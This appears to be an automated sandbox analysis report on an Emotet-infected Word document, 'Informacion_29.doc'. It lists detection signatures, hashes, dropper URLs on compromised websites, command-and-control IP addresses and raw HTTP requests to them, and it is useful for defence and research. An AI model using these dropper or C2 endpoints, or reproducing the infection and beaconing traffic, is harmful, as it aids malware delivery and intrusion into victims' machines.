Analysis Report Informacion_29.doc

Overview

General Information

Sample Name: Informacion_29.doc
Analysis ID: 336937
MD5: 6c1cb4c06ead6f5ce29a931fa12410fa
SHA1: 4ac228fa54e73993dcccb69389a97cfcf67228b5
SHA256: 43dab9a4e7aaa8a0d894f6e64d73bb829dd8c40ff8161233fb6e0886b14819c3

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Multi AV Scanner detection for domain / URL
Source: rycomputer.com Virustotal: Detection: 11% Perma Link
Source: 00zyku.com Virustotal: Detection: 7% Perma Link
Source: wheelcomoving.com Virustotal: Detection: 7% Perma Link
Source: d-cem.com Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll Metadefender: Detection: 63% Perma Link
Source: C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll ReversingLabs: Detection: 60%
Multi AV Scanner detection for submitted file
Source: Informacion_29.doc Virustotal: Detection: 62% Perma Link
Source: Informacion_29.doc ReversingLabs: Detection: 79%

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034375AE CryptDecodeObjectEx, 14_2_034375AE
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 58.97.195.135:443 -> 192.168.2.3:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.214.169.246:443 -> 192.168.2.3:49723 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000004.00000002.290931845.0000018A2C3AD000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.290506606.0000018A2C08B000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb* source: powershell.exe, 00000004.00000002.290573053.0000018A2C122000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbJ source: powershell.exe, 00000004.00000002.290573053.0000018A2C122000.00000004.00000001.sdmp
Source: Binary string: B:\cliprgn_src\Release\ClipRgn.pdb source: rundll32.exe, 0000000D.00000002.285896384.0000000010042000.00000002.00020000.sdmp, Q27V.dll.4.dr
Source: Binary string: System.pdb source: powershell.exe, 00000004.00000002.290506606.0000018A2C08B000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000004.00000002.290651149.0000018A2C320000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100272AB FindFirstFileExW,FindNextFileW,FindClose, 13_2_100272AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10026EEF FindFirstFileExW, 13_2_10026EEF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343109C FindFirstFileW, 14_2_0343109C

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: wheelcomoving.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49722 -> 58.97.195.135:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49711 -> 66.85.46.76:80

Networking:

barindex
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="vide8x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="The Ke
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="vide8x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="The Ke0
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/what-to-avoid-on-a-ketogenic-diet-what-is-ketogenic-diet/" rel="bookmark" title="WHAT TO AVOID ON A KETOGENIC DIET | What is Ketogenic Diet?"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-TO-AVOID-ON-A-KETOGENIC-DIET-What-is-Ketogenic-Diet-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="WHAT TO AVOID ON A KETOGENIC DIET | What is Ketogenic Diet?"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/pepito-manaloto-keto-diet-sagot-sa-katabaan-ni-mara/" rel="bookmark" title="Pepito Manaloto: Keto diet, sagot sa katabaan ni Mara?"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Pepito-Manaloto-Keto-diet-sagot-sa-katabaan-ni-Mara-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Pepito Manaloto: Keto diet, sagot sa katabaan ni Mara?"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/what-i-eat-to-lose-weight-2020-easy-keto-recipes-keto-full-day-eating-daniela-diaries/" rel="bookmark" title="WHAT I EAT TO LOSE WEIGHT 2020 / EASY KETO RECIPES / KETO FULL DAY EATING / DANIELA DIARIES"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/WHAT-I-EAT-TO-LOSE-WEIGHT-2020-EASY-KETO-RECIPES-KETO-FULL-DAY-EATING-DANIELA-DIARIES-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="WHAT I EAT TO LOSE WEIGHT 2020 / EASY KETO RECIPES / KETO FULL DAY EATING / DANIELA DIARIES"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/beyond-keto-virtual-summit-the-mid-life-re-life-blueprint-programme-free-all-access-pass/" rel="bookmark" title="Beyond Keto Virtual Summit &#8211; The Mid-Life Re-Life Blueprint Programme &#8211; Free All Access Pass"><img width="324" height="160" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-324x160.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-324x160.jpg 324w, https://ketoresetme.com/wp-content/uploads/2021/01/Beyond-Keto-Virtual-Summit-The-Mid-Life-Re-Life-Blueprint-Programme-Free-All-Access-Pass-533x261.jpg 533w" sizes="(max-width: 324px) 100vw, 324px" alt="" title="Beyond Keto Virtual Summit &#8211; The Mid-Life Re-Life Blueprint Programme &#8211; Free All Access Pass"/><span class="td-video-play-ico"><img width="40" height="40" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/ico-video-large.png" alt="video"/></span></a></div> </div>
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/07/the-ketonian-cookbook-quick-and-easy-low-carb/" rel="bookmark" title="The Ketonian Cookbook &#8211; QUICK AND EASY LOW CARB"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/The-Ketonian-Cookbook-QUICK-AND-EASY-LOW-CARB-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="The Ketonian Cookbook &#8211; QUICK AND EASY LOW CARB"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="video"/></span></a></div>
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="vide
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in memory: <div class="td-module-thumb"><a href="https://ketoresetme.com/2021/01/06/keto-reset-instant-pot-cookbook-trailer/" rel="bookmark" title="Keto Reset Instant Pot Cookbook Trailer"><img width="100" height="70" class="entry-thumb" src="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg" srcset="https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-100x70.jpg 100w, https://ketoresetme.com/wp-content/uploads/2021/01/Keto-Reset-Instant-Pot-Cookbook-Trailer-218x150.jpg 218w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Keto Reset Instant Pot Cookbook Trailer"/><span class="td-video-play-ico td-video-small"><img width="20" height="20" class="td-retina" src="http://ketoresetme.com/wp-content/themes/Newspaper/images/icons/video-small.png" alt="vide0
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in memory: type-post_type menu-item-object-page menu-item-1158"><a title="" href="https://wheelcomoving.com/company/">About us</a></li><li id="menu-item-1138" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1138"><a title="" href="https://wheelcomoving.com/company/contact/">Contact</a></li><li id="menu-item-1406" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1406"><a title="" href="https://wheelcomoving.com/services/">Our Services</a><ul class="sub-menu"><li id="menu-item-1143" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1143"><a title="" href="https://wheelcomoving.com/services/trucking/">Trucking</a></li><li id="menu-item-1141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1141"><a title="" href="https://wheelcomoving.com/services/air-cargo/">Air Cargo</a></li><li id="menu-item-1140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1140"><a title="" href="https://wheelcomoving.com/services/ocean-cargo/">Ocean Cargo</a></li><li id="menu-item-1142" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1142"><a title="" href="https://wheelcomoving.com/services/courier/">Courier</a></li></ul></li>
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div>
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in memory: <li id="menu-item-1598" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-1598"><a title="" href="https://wheelcomoving.com/">Home</a></li><li id="menu-item-2113" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2113"><a href="https://wheelcomoving.com/track-and-trace/">TRACK AND TRACE</a></li><li id="menu-item-1158" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1158"><a title="" href="https://wheelcomoving.com/company/">About us</a></li><li id="menu-item-1138" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1138"><a title="" href="https://wheelcomoving.com/company/contact/">Contact</a></li><li id="menu-item-1406" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1406"><a title="" href="https://wheelcomoving.com/services/">Our Services</a><ul class="sub-menu"><li id="menu-item-1143" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1143"><a title="" href="https://wheelcomoving.com/services/trucking/">Trucking</a></li><li id="menu-item-1141" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1141"><a title="" href="https://wheelcomoving.com/services/air-cargo/">Air Cargo</a></li><li id="menu-item-1140" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1140"><a title="" href="https://wheelcomoving.com/services/ocean-cargo/">Ocean Cargo</a></li><li id="menu-item-1142" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1142"><a title="" href="https://wheelcomoving.com/services/courier/">Courier</a></li></ul></li>
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in memory: http://wheelcomoving.com/p/RuMeRPa/
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in memory: http://00zyku.com/wp-admin/eYu1Q/
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in memory: http://ketoresetme.com/wp-content/pmJ/
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in memory: https://rycomputer.com/content/TL/
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in memory: https://d-cem.com/wp-admin/JSLwG1/
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in memory: http://thebestfikrah.com/wp-admin/fOIlVX/
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in memory: https://phawayagency.com/wp-admin/mXo4b/
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49755 -> 138.197.99.250:8080
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /p/RuMeRPa/ HTTP/1.1Host: wheelcomoving.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/pmJ/ HTTP/1.1Host: ketoresetme.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 66.85.46.76 66.85.46.76
Source: Joe Sandbox View IP Address: 152.170.79.100 152.170.79.100
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HOST4GEEKS-LLCUS HOST4GEEKS-LLCUS
Source: Joe Sandbox View ASN Name: TelecomArgentinaSAAR TelecomArgentinaSAAR
Source: Joe Sandbox View ASN Name: TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH TRUEINTERNET-AS-APTRUEINTERNETCoLtdTH
Source: Joe Sandbox View ASN Name: TelecomArgentinaSAAR TelecomArgentinaSAAR
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/ HTTP/1.1DNT: 0Referer: 138.197.99.250/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/Content-Type: multipart/form-data; boundary=---------------------jHDY9OeuzPzg6fZb1CxtnUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 138.197.99.250:8080Content-Length: 6500Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 152.170.79.100
Source: unknown TCP traffic detected without corresponding DNS query: 152.170.79.100
Source: unknown TCP traffic detected without corresponding DNS query: 152.170.79.100
Source: unknown TCP traffic detected without corresponding DNS query: 190.247.139.101
Source: unknown TCP traffic detected without corresponding DNS query: 190.247.139.101
Source: unknown TCP traffic detected without corresponding DNS query: 190.247.139.101
Source: unknown TCP traffic detected without corresponding DNS query: 138.197.99.250
Source: unknown TCP traffic detected without corresponding DNS query: 138.197.99.250
Source: unknown TCP traffic detected without corresponding DNS query: 138.197.99.250
Source: unknown TCP traffic detected without corresponding DNS query: 138.197.99.250
Source: unknown TCP traffic detected without corresponding DNS query: 138.197.99.250
Source: unknown TCP traffic detected without corresponding DNS query: 138.197.99.250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0344023A InternetReadFile, 14_2_0344023A
Source: global traffic HTTP traffic detected: GET /p/RuMeRPa/ HTTP/1.1Host: wheelcomoving.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/pmJ/ HTTP/1.1Host: ketoresetme.comConnection: Keep-Alive
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: <div class="btIco borderless extrasmall"><a href="https://www.facebook.com/boldthemes/" target="_blank" data-ico-fa="&#xf09a;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://twitter.com/bold_themes" target="_blank" data-ico-fa="&#xf099;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://plus.google.com/106260443376081681677" target="_blank" data-ico-fa="&#xf0d5;" class="btIcoHolder"></a></div><div class="btIco borderless extrasmall"><a href="https://www.pinterest.com/boldthemes/" target="_blank" data-ico-fa="&#xf231;" class="btIcoHolder"></a></div><div class="btTopBox widget_search"><div class="btSearch"><div class="btIco default extrasmall"><a href="#" data-ico-fa="&#xf002;" class="btIcoHolder"></a></div> equals www.twitter.com (Twitter)
Source: unknown DNS traffic detected: queries for: wheelcomoving.com
Source: unknown HTTP traffic detected: POST /pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/ HTTP/1.1DNT: 0Referer: 138.197.99.250/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5jeelwiaa1pjy12utx/Content-Type: multipart/form-data; boundary=---------------------jHDY9OeuzPzg6fZb1CxtnUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 138.197.99.250:8080Content-Length: 6500Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Jan 2021 10:52:58 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://wheelcomoving.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, Keep-AliveVary: Accept-EncodingKeep-Alive: timeout=5, max=100Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 0d 0a 09 0d 0a Data Ascii: 32<!DOCTYPE html><html lang="en-US"><head>
Source: powershell.exe, 00000004.00000002.289183876.0000018A152D0000.00000004.00000001.sdmp String found in binary or memory: http://00zyku.com
Source: powershell.exe, 00000004.00000002.289021787.0000018A1517E000.00000004.00000001.sdmp String found in binary or memory: http://00zyku.com/wp-admin/eYu1Q/
Source: powershell.exe, 00000004.00000002.289171312.0000018A152BB000.00000004.00000001.sdmp String found in binary or memory: http://00zyku.comx
Source: rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp String found in binary or memory: http://138.197.99.250:8080/pojcpxbjelqvypvfo/yrdgm/3jyit2m1109dcs3q5kt/4fhdprpbuz1qz/rfz2dy2jzdc4/o5
Source: rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/
Source: rundll32.exe, 0000000E.00000003.411786554.0000000003271000.00000004.00000001.sdmp String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/(
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/7
Source: rundll32.exe, 0000000E.00000002.470615801.000000000326D000.00000004.00000020.sdmp String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/T
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/V
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/e
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/gss
Source: rundll32.exe, 0000000E.00000002.470569025.000000000324A000.00000004.00000020.sdmp String found in binary or memory: http://152.170.79.100/j7ikmqucj4czhoo1j/xm5fe1c4u3xnf0w4/srbydtlp6bursq/pjwyw8uhs9elkpfo9/s
